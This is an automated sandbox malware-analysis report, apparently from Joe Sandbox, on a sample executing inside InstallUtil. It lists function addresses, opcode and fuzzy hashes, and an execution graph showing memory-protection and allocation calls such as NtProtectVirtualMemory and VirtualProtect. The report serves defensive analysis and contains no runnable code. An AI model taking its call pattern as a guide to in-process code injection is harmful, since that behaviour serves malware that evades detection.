                            • Instruction ID: c4065a80d2e4bd4264e65417d4484ab0dcf48ebbd1a7da2ebd6c18c4ebb28e56
                            • Opcode Fuzzy Hash: a9958ead8f770cd9bbda24ff5d86dfc6f790857662f92691ad2d2035f87fb5dc
                            • Instruction Fuzzy Hash: 08419A79C0925A9FCB11EFB898645EDBFF0FF5A300B1440AAD840A7391E7345949CBB1
                            Function 00DD3428 Relevance: .1, Instructions: 112COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c22c50bd149dbd1516127782e995c885769942f11b1b8b8a9dfca9b32a0284b
                            • Instruction ID: 9df360bf16ee5784bc37772ec5e83b7a071629fd4e03b265721bda9fb85614ed
                            • Opcode Fuzzy Hash: 0c22c50bd149dbd1516127782e995c885769942f11b1b8b8a9dfca9b32a0284b
                            • Instruction Fuzzy Hash: ED31E935B003658BDF2D5A6A699427E65EAABC4350F1C443FD906C3380DFB8CE4596B2
                            Function 00DD4DD0 Relevance: .1, Instructions: 101COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8ecfa8ad665d8cd1c071941f306ddf5a783907180065501a2f10ffe3e8f6ecf
                            • Instruction ID: d5526df913e94730fb84a81322a6e2acf29e8bc06c1a248fb6152cc616baf6c0
                            • Opcode Fuzzy Hash: b8ecfa8ad665d8cd1c071941f306ddf5a783907180065501a2f10ffe3e8f6ecf
                            • Instruction Fuzzy Hash: 7231C139740119AFCF199F64D844AAF7BA2FF88710F148426F9058B394CB75CD6ADBA0
                            Function 00DD76E8 Relevance: .1, Instructions: 90COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2266cdcc386745ce289c2e65cbbe4a314fb9372a6d3bdd3b5e3ba370d241f23
                            • Instruction ID: cd66ad2d73fdb083fca0bfe1336243d0b73444d586e282030c87d29f92ef5c0d
                            • Opcode Fuzzy Hash: d2266cdcc386745ce289c2e65cbbe4a314fb9372a6d3bdd3b5e3ba370d241f23
                            • Instruction Fuzzy Hash: 4321F5383082116BEB251B79C49427D37D7AFD9745B2C48BAD502CB391FE24CC46A7A0
                            Function 00DD76F8 Relevance: .1, Instructions: 87COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e288dfc5682fd15c44931eef1aca29ea8c161b3bffcf0b0546f94b2e7bf06178
                            • Instruction ID: 1f775ee973763eb6b1880568992b6f28b44e78f3bbfb45407dfb22c6a7218191
                            • Opcode Fuzzy Hash: e288dfc5682fd15c44931eef1aca29ea8c161b3bffcf0b0546f94b2e7bf06178
                            • Instruction Fuzzy Hash: C621D7383081116BEB241A65C49477E36D7AFC8754F3888BAD502CB394FE65CC82A7A0
                            Function 00DD5A6B Relevance: .1, Instructions: 79COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9465de5f5459e5039d6b916839ee8d2763a6c5d5ab0ded7dce572674324fc552
                            • Instruction ID: 1cfe9b94cc892cd712397a8bdb54658a6974fdad7a334d8729f1e648201b2813
                            • Opcode Fuzzy Hash: 9465de5f5459e5039d6b916839ee8d2763a6c5d5ab0ded7dce572674324fc552
                            • Instruction Fuzzy Hash: 0C213A38701B218FD3299B25E89452BB792FF85710B19816AE806CB389CF34DC0687D0
                            Function 00DD2060 Relevance: .1, Instructions: 77COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: baaed1a82724b289d3f0f33740d23ddbdbeeef972980c1cc0055894f1ab49ecf
                            • Instruction ID: 70ab7fe9dd5bc08cba1dea780bc601328cee0ea9472996cc5bdb7693cd1b3f86
                            • Opcode Fuzzy Hash: baaed1a82724b289d3f0f33740d23ddbdbeeef972980c1cc0055894f1ab49ecf
                            • Instruction Fuzzy Hash: C621B635A012599FCF14DF64C4409BE77A5EBA9360F54C45AE8099B340DF31EE46CBE1
                            Function 00D8D044 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3452792221.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_d8d000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5e53759c2f76fea366c40038c0a9331b63e35a097b246a512a5d89587ebb55c
                            • Instruction ID: cb7f17a4349821540237b276fdc9f4662cf6da4a6c18d575aa030da573a585ba
                            • Opcode Fuzzy Hash: f5e53759c2f76fea366c40038c0a9331b63e35a097b246a512a5d89587ebb55c
                            • Instruction Fuzzy Hash: 0521B0B1604204EFDB14EF24D9C4B26BB66FB84314F24C56DE9494B2D2C77AD846CB72
                            Function 00DD215C Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c491dc626f8150a9f088ca81e3f57b8469e6e8ba4e0ec4a37044ebed0b14ec8
                            • Instruction ID: bb3a8ac45951134f28bfbaa75b4797864fc4ee30a228fc6319e3288a902345ac
                            • Opcode Fuzzy Hash: 4c491dc626f8150a9f088ca81e3f57b8469e6e8ba4e0ec4a37044ebed0b14ec8
                            • Instruction Fuzzy Hash: 72117832E043599FCB019BB89C108EEFB70FF99310B258757E566B7150EA316906C7A1
                            Function 00DD39ED Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 22af4c1f1fdabbf69f0d83dde51850ee69938a096315a845251075273485f9eb
                            • Instruction ID: 25ad70dc9db4ba5c789b32ef0f8fb09f95863a6db1c2e545ebb97a3543dffeb9
                            • Opcode Fuzzy Hash: 22af4c1f1fdabbf69f0d83dde51850ee69938a096315a845251075273485f9eb
                            • Instruction Fuzzy Hash: 94319578E11248CFCB44DFA8E59499DBBB2FF49311B209469E809AB364D731ED45DF40
                            Function 00DD4DC3 Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a80fa14db16f3b4f607318be975b10bbfc5ead7a3d27af5cffc375d343cb9b1b
                            • Instruction ID: c72ee0b71fb968f5eff4bc683d0be0ab53ba9a3e465dfeb06f77f929a907a577
                            • Opcode Fuzzy Hash: a80fa14db16f3b4f607318be975b10bbfc5ead7a3d27af5cffc375d343cb9b1b
                            • Instruction Fuzzy Hash: 0321DE39A44214AFDB199F24D44476B7BA2FF88710F24446AF9058B385CB38CD9ACBB0
                            Function 00DDD4D0 Relevance: .1, Instructions: 59COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3deb49ff0bc2ac172038cac126521827fa51eac590045e6a75ac04e8ff8e7d27
                            • Instruction ID: 43dfe78ebd5702e616cecc802355f09bad17a9cac333cf2b82aff9f4bc3de9ee
                            • Opcode Fuzzy Hash: 3deb49ff0bc2ac172038cac126521827fa51eac590045e6a75ac04e8ff8e7d27
                            • Instruction Fuzzy Hash: 77214C70D0024ADFEB41EFB8D85079EBFF2EB45300F1085AAC0549B355E7745A068B91
                            Function 00DD5A78 Relevance: .1, Instructions: 59COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 69ddad2ed6534efcac68840a55ef0d9be7a6153bcf2a36166f8df785b5a0d2fe
                            • Instruction ID: 27289d533744c96047f72654a0ee07fd51e70a52df7c32d24135fbc6094f8416
                            • Opcode Fuzzy Hash: 69ddad2ed6534efcac68840a55ef0d9be7a6153bcf2a36166f8df785b5a0d2fe
                            • Instruction Fuzzy Hash: 26112B39701A229FD7299B2AE49493EB796FFC4750719457AE806CB354CF30EC0287E0
                            Function 00DD1F61 Relevance: .1, Instructions: 55COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 31d8caa27ec36f38634b130a68f0153b84d2d20966166db4e342bde393a2f75e
                            • Instruction ID: 444ed8ab4edab7fc71bc8e4db95a42a1db6a11974e25b84a547fd97c55292be0
                            • Opcode Fuzzy Hash: 31d8caa27ec36f38634b130a68f0153b84d2d20966166db4e342bde393a2f75e
                            • Instruction Fuzzy Hash: 0021CFB8C0520A8FCB50EFA8D9555EEBFF0FF49300F10956AD805B7260EB305A59CBA1
                            Function 00DDD4E0 Relevance: .1, Instructions: 54COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b34bef80805247f15dfb6072d208369671efb0c8ab14e7f3ba25cff5c30e8641
                            • Instruction ID: ecfadb8010713884104adc98d1b86af94485f20963d8bed4e4bc6f6293a4b80e
                            • Opcode Fuzzy Hash: b34bef80805247f15dfb6072d208369671efb0c8ab14e7f3ba25cff5c30e8641
                            • Instruction Fuzzy Hash: E0115E74D0020ADFEB40EFB8E95079EBFF2FB85300F1085AAC1549B354EB745A068B90
                            Function 00D8D03F Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3452792221.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_d8d000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                            • Instruction ID: 79050c769ac925d408f5247d203fe1369ee12760f948ac30b9d62cb945174e87
                            • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                            • Instruction Fuzzy Hash: 32119A75504284DFCB15DF10D9C4B16FFA2FB84314F28C6AAE8494B696C33AD84ACF62
                            Function 00DD560F Relevance: .1, Instructions: 51COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9f7b423955637d69d911677206523107b95584f290b636b01542619c518287e3
                            • Instruction ID: 42da565f241054f1679414b2e0b2f4e0673658ca302e8774fc6cc7f5e5de931f
                            • Opcode Fuzzy Hash: 9f7b423955637d69d911677206523107b95584f290b636b01542619c518287e3
                            • Instruction Fuzzy Hash: E20128B6B041146FCB099E64A8107AF3FE7DFC8751B28806BF904CB294CE75CD168BA0
                            Function 00DD2010 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 815e157c0ebb6c87812528d0e1f712f52e0e9b3b524b6527cdaf35554c8041f8
                            • Instruction ID: 1f3dd74d3dd9b8f159d54ae6b6cf3b096e0e2f3a84627a35c3f88f04753ef39e
                            • Opcode Fuzzy Hash: 815e157c0ebb6c87812528d0e1f712f52e0e9b3b524b6527cdaf35554c8041f8
                            • Instruction Fuzzy Hash: D5E0D831D143D74AC70297B0AC540FEBF30DDD7610B1586BAD0A07B041DB30151BC761
                            Function 00DD2020 Relevance: .0, Instructions: 19COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 010a9b75d68022ca932983bbaa60ef5bb1eadd29e066d0b787356d2b0d120b7d
                            • Instruction ID: 76d11c61ae604af78a2df147a7dd9ff603c47e304809cef8dd32cb21c2aae4f9
                            • Opcode Fuzzy Hash: 010a9b75d68022ca932983bbaa60ef5bb1eadd29e066d0b787356d2b0d120b7d
                            • Instruction Fuzzy Hash: 16D05B31D2126B57CB00E7A5DC044EFF738EED5661B544626D51437140FB702659C7E1
                            Function 00DD8270 Relevance: .0, Instructions: 18COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                            • Instruction ID: 9d213001eb65c076984ba6f8e3fc8aa696da8f0ae7f7812e46fe636dd7d2ec18
                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                            • Instruction Fuzzy Hash: 84C0123320C5282AA626108E7C45AABBA8CE3C1BB4B290137F55CC320098429C8022F8
                            Function 00DDA71D Relevance: .0, Instructions: 16COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bec88708ab2501968057e31bf182c45a711a9ae245c54750a5fd2740009b4a85
                            • Instruction ID: 2f7a184c2bf2e42e565ad4d2527feafb74bd99e7c2b7179aab776d55efdcf84e
                            • Opcode Fuzzy Hash: bec88708ab2501968057e31bf182c45a711a9ae245c54750a5fd2740009b4a85
                            • Instruction Fuzzy Hash: 9AD0177BB400089FCB04CF88E8409DDB7B6FB8C221B008016E911A3260C6319821CB60
                            Function 00DDF024 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 284c029907384703b493ce641c27a1e69fa9f23d93376eeeae6994541021d894
                            • Instruction ID: 6ebbf7f8e54ba46c8ed2ef90dc901f749a8cc1daccc9ff2631914f9c829609ec
                            • Opcode Fuzzy Hash: 284c029907384703b493ce641c27a1e69fa9f23d93376eeeae6994541021d894
                            • Instruction Fuzzy Hash: 09D04238D44118CBCB209F64E9543ACB7B0EB85301F1158A7D90DA2250D6306A649F11
                            Function 00DD5EB0 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e307d20e6c1e6c78e37cfeea1438d3dd1b49aba0d12245dd9db077b40a301f2
                            • Instruction ID: 45b20a164d1fc4a933e9d73f66c2bae566a54b84f23a20ab27a870f8f5f7f8c3
                            • Opcode Fuzzy Hash: 6e307d20e6c1e6c78e37cfeea1438d3dd1b49aba0d12245dd9db077b40a301f2
                            • Instruction Fuzzy Hash: 62D0C27040C3824BD706F730FC202453F61AB82304F5050E5A80449057FE7D08068791
                            Function 00DD5EC0 Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1dba04c5e844d78982443cd64e50772917c4635156bdbf81b32dcfdc4eb210d8
                            • Instruction ID: 6eb70ba73020e55a0226081ca8ddb00d7b297fa127b1505fa2b75aebc445edaa
                            • Opcode Fuzzy Hash: 1dba04c5e844d78982443cd64e50772917c4635156bdbf81b32dcfdc4eb210d8
                            • Instruction Fuzzy Hash: D9C0123050430A87D509F775F9556957B6AEAC0700F50A564B50909119EE7D19464690

                            Execution Graph

                            Execution Coverage:11.3%
                            Dynamic/Decrypted Code Coverage:99.3%
                            Signature Coverage:0%
                            Total number of Nodes:418
                            Total number of Limit Nodes:36
                            execution_graph 54721 5dae0db 54722 5dae0e5 54721->54722 54726 5e503c9 54722->54726 54735 5e503d8 54722->54735 54723 5dad7c2 54727 5e503d8 54726->54727 54744 5e50910 54727->54744 54753 5e5093a 54727->54753 54762 5e5040a 54727->54762 54771 5e504bb 54727->54771 54780 5e50418 54727->54780 54789 5e505cd 54727->54789 54728 5e50403 54728->54723 54736 5e503ed 54735->54736 54738 5e50910 3 API calls 54736->54738 54739 5e505cd 2 API calls 54736->54739 54740 5e50418 3 API calls 54736->54740 54741 5e504bb 3 API calls 54736->54741 54742 5e5040a 3 API calls 54736->54742 54743 5e5093a 3 API calls 54736->54743 54737 5e50403 54737->54723 54738->54737 54739->54737 54740->54737 54741->54737 54742->54737 54743->54737 54745 5e50497 54744->54745 54746 5e504ac 54745->54746 54794 5e36cc0 54745->54794 54799 5e36cb0 54745->54799 54746->54728 54747 5e5089b 54747->54728 54748 5e505a1 54748->54747 54751 5e3d871 VirtualProtect 54748->54751 54752 5e3d878 VirtualProtect 54748->54752 54751->54748 54752->54748 54754 5e504ac 54753->54754 54755 5e50497 54753->54755 54754->54728 54755->54754 54760 5e36cc0 NtProtectVirtualMemory 54755->54760 54761 5e36cb0 NtProtectVirtualMemory 54755->54761 54756 5e5089b 54756->54728 54757 5e505a1 54757->54756 54758 5e3d871 VirtualProtect 54757->54758 54759 5e3d878 VirtualProtect 54757->54759 54758->54757 54759->54757 54760->54757 54761->54757 54764 5e50445 54762->54764 54763 5e504ac 54763->54728 54764->54763 54769 5e36cc0 NtProtectVirtualMemory 54764->54769 54770 5e36cb0 NtProtectVirtualMemory 54764->54770 54765 5e505a1 54766 5e5089b 54765->54766 54767 5e3d871 VirtualProtect 54765->54767 54768 5e3d878 VirtualProtect 54765->54768 54766->54728 54767->54765 54768->54765 54769->54765 54770->54765 54773 5e50497 54771->54773 54772 5e504ac 54772->54728 54773->54772 54778 5e36cc0 NtProtectVirtualMemory 54773->54778 54779 5e36cb0 NtProtectVirtualMemory 54773->54779 54774 5e5089b 54774->54728 54775 5e505a1 54775->54774 54776 5e3d871 VirtualProtect 54775->54776 54777 5e3d878 VirtualProtect 54775->54777 54776->54775 54777->54775 54778->54775 54779->54775 54782 5e50445 54780->54782 54781 5e504ac 54781->54728 54782->54781 54787 5e36cc0 NtProtectVirtualMemory 54782->54787 54788 5e36cb0 NtProtectVirtualMemory 54782->54788 54783 5e5089b 54783->54728 54784 5e505a1 54784->54783 54785 5e3d871 VirtualProtect 54784->54785 54786 5e3d878 VirtualProtect 54784->54786 54785->54784 54786->54784 54787->54784 54788->54784 54791 5e505d3 54789->54791 54790 5e5089b 54790->54728 54791->54790 54792 5e3d871 VirtualProtect 54791->54792 54793 5e3d878 VirtualProtect 54791->54793 54792->54791 54793->54791 54795 5e36cc1 54794->54795 54805 5e36e99 54795->54805 54809 5e36ea8 54795->54809 54796 5e36cf8 54796->54748 54800 5e36c5a 54799->54800 54801 5e36cbe 54799->54801 54800->54748 54803 5e36e99 NtProtectVirtualMemory 54801->54803 54804 5e36ea8 NtProtectVirtualMemory 54801->54804 54802 5e36cf8 54802->54748 54803->54802 54804->54802 54807 5e36ecf 54805->54807 54806 5e36f05 54806->54796 54807->54806 54813 5e37768 54807->54813 54811 5e36ecf 54809->54811 54810 5e36f05 54810->54796 54811->54810 54812 5e37768 NtProtectVirtualMemory 54811->54812 54812->54811 54814 5e3777d 54813->54814 54815 5e3779b 54814->54815 54817 5e37951 54814->54817 54815->54807 54818 5e37933 54817->54818 54819 5e381af 54817->54819 54822 5e38631 54819->54822 54827 5e38640 54819->54827 54823 5e38640 54822->54823 54832 5e38cc4 54823->54832 54837 5e38ace 54823->54837 54824 5e38670 54824->54818 54828 5e38655 54827->54828 54830 5e38cc4 NtProtectVirtualMemory 54828->54830 54831 5e38ace NtProtectVirtualMemory 54828->54831 54829 5e38670 54829->54818 54830->54829 54831->54829 54833 5e38cd3 54832->54833 54842 5e391f8 54833->54842 54847 5e39208 54833->54847 54834 5e387ee 54834->54824 54838 5e38add 54837->54838 54860 5e3b148 54838->54860 54864 5e3b158 54838->54864 54843 5e39208 54842->54843 54852 5e39241 54843->54852 54856 5e39250 54843->54856 54844 5e39232 54844->54834 54848 5e3921f 54847->54848 54850 5e39241 NtProtectVirtualMemory 54848->54850 54851 5e39250 NtProtectVirtualMemory 54848->54851 54849 5e39232 54849->54834 54850->54849 54851->54849 54853 5e39273 54852->54853 54855 5e39b82 NtProtectVirtualMemory 54853->54855 54854 5e39316 54854->54844 54855->54854 54857 5e39273 54856->54857 54859 5e39b82 NtProtectVirtualMemory 54857->54859 54858 5e39316 54858->54844 54859->54858 54861 5e3b158 54860->54861 54868 5e3b285 54861->54868 54865 5e3b16d 54864->54865 54867 5e3b285 NtProtectVirtualMemory 54865->54867 54866 5e387ee 54866->54824 54867->54866 54869 5e3b296 54868->54869 54870 5e3b230 54869->54870 54871 5e3b977 NtProtectVirtualMemory 54869->54871 54871->54870 54952 5e36926 54953 5e35559 54952->54953 54954 5e36b58 NtProtectVirtualMemory 54953->54954 54954->54953 54914 136d01c 54915 136d034 54914->54915 54916 136d08f 54915->54916 54918 5e4db78 54915->54918 54919 5e4dbd1 54918->54919 54922 5e4e108 54919->54922 54920 5e4dc06 54923 5e4e135 54922->54923 54926 5e4e2cb 54923->54926 54927 5e4cf90 54923->54927 54926->54920 54929 5e4cfb7 54927->54929 54931 5e4d490 54929->54931 54932 5e4d4d9 VirtualProtect 54931->54932 54934 5e4d074 54932->54934 54934->54920 54955 16357a8 54956 16357c5 54955->54956 54957 16357d5 54956->54957 54960 5e42405 54956->54960 54963 5e41099 54956->54963 54962 5e4cf90 VirtualProtect 54960->54962 54961 5e4241d 54962->54961 54964 5e410b8 54963->54964 54966 5e4cf90 VirtualProtect 54964->54966 54965 5e401d5 54966->54965 54872 5e3636f 54873 5e3638e 54872->54873 54875 5e36b58 NtProtectVirtualMemory 54873->54875 54874 5e35559 54877 5e36b58 54874->54877 54875->54874 54878 5e36b95 54877->54878 54880 5e36cc0 NtProtectVirtualMemory 54878->54880 54881 5e36cb0 NtProtectVirtualMemory 54878->54881 54879 5e36bd2 54879->54874 54880->54879 54881->54879 55246 5dad9b6 55247 5dad9c0 55246->55247 55251 5e34cf1 55247->55251 55256 5e34d00 55247->55256 55248 5dad9fe 55252 5e34d15 55251->55252 55261 5e34d31 55252->55261 55266 5e34d40 55252->55266 55253 5e34d2b 55253->55248 55257 5e34d15 55256->55257 55259 5e34d31 2 API calls 55257->55259 55260 5e34d40 2 API calls 55257->55260 55258 5e34d2b 55258->55248 55259->55258 55260->55258 55262 5e34d3a 55261->55262 55263 5e34f90 55262->55263 55271 5e38f20 55262->55271 55275 5e38f28 55262->55275 55263->55253 55268 5e34d6a 55266->55268 55267 5e34f90 55267->55253 55268->55267 55269 5e38f20 SleepEx 55268->55269 55270 5e38f28 SleepEx 55268->55270 55269->55268 55270->55268 55272 5e38f6c SleepEx 55271->55272 55274 5e38fcc 55272->55274 55274->55262 55276 5e38f6c SleepEx 55275->55276 55278 5e38fcc 55276->55278 55278->55262 54935 5e3604d 54936 5e36075 54935->54936 54939 5e36b58 NtProtectVirtualMemory 54936->54939 54937 5e35559 54938 5e36b58 NtProtectVirtualMemory 54937->54938 54938->54937 54939->54937 54882 5dad8cc 54883 5dad8d6 54882->54883 54887 5e3f691 54883->54887 54891 5e3f6a0 54883->54891 54884 5dad7c2 54888 5e3f6a0 54887->54888 54895 5e3f843 54888->54895 54892 5e3f6b5 54891->54892 54894 5e3f843 3 API calls 54892->54894 54893 5e3f6cb 54893->54884 54894->54893 54896 5e3f865 54895->54896 54897 5e36cc0 NtProtectVirtualMemory 54896->54897 54899 5e3f914 54897->54899 54898 5e3f6cb 54898->54884 54899->54898 54902 5e3d878 54899->54902 54906 5e3d871 54899->54906 54903 5e3d8c1 VirtualProtect 54902->54903 54905 5e3d92e 54903->54905 54905->54899 54907 5e3d8c1 VirtualProtect 54906->54907 54909 5e3d92e 54907->54909 54909->54899 55279 5e35814 55280 5e3587f 55279->55280 55282 5e35559 55279->55282 55283 5e36b58 NtProtectVirtualMemory 55280->55283 55281 5e358e5 55284 5e36b58 NtProtectVirtualMemory 55282->55284 55283->55281 55284->55282 54944 5e4e658 54945 5e4e69c VirtualAlloc 54944->54945 54947 5e4e709 54945->54947 54975 5e356bf 54976 5e356e0 54975->54976 54978 5e36b58 NtProtectVirtualMemory 54976->54978 54977 5e35719 54978->54977 54979 5dae007 54980 5dae011 54979->54980 54984 5e577a9 54980->54984 54993 5e577b8 54980->54993 54981 5dad7c2 54985 5e577b8 54984->54985 55002 5e5786b 54985->55002 55006 5e577f8 54985->55006 55010 5e577e9 54985->55010 55014 5e5792f 54985->55014 55018 5e578b5 54985->55018 55022 5e578c5 54985->55022 54986 5e577e3 54986->54981 54994 5e577cd 54993->54994 54996 5e578c5 15 API calls 54994->54996 54997 5e578b5 15 API calls 54994->54997 54998 5e5792f 15 API calls 54994->54998 54999 5e577e9 15 API calls 54994->54999 55000 5e577f8 15 API calls 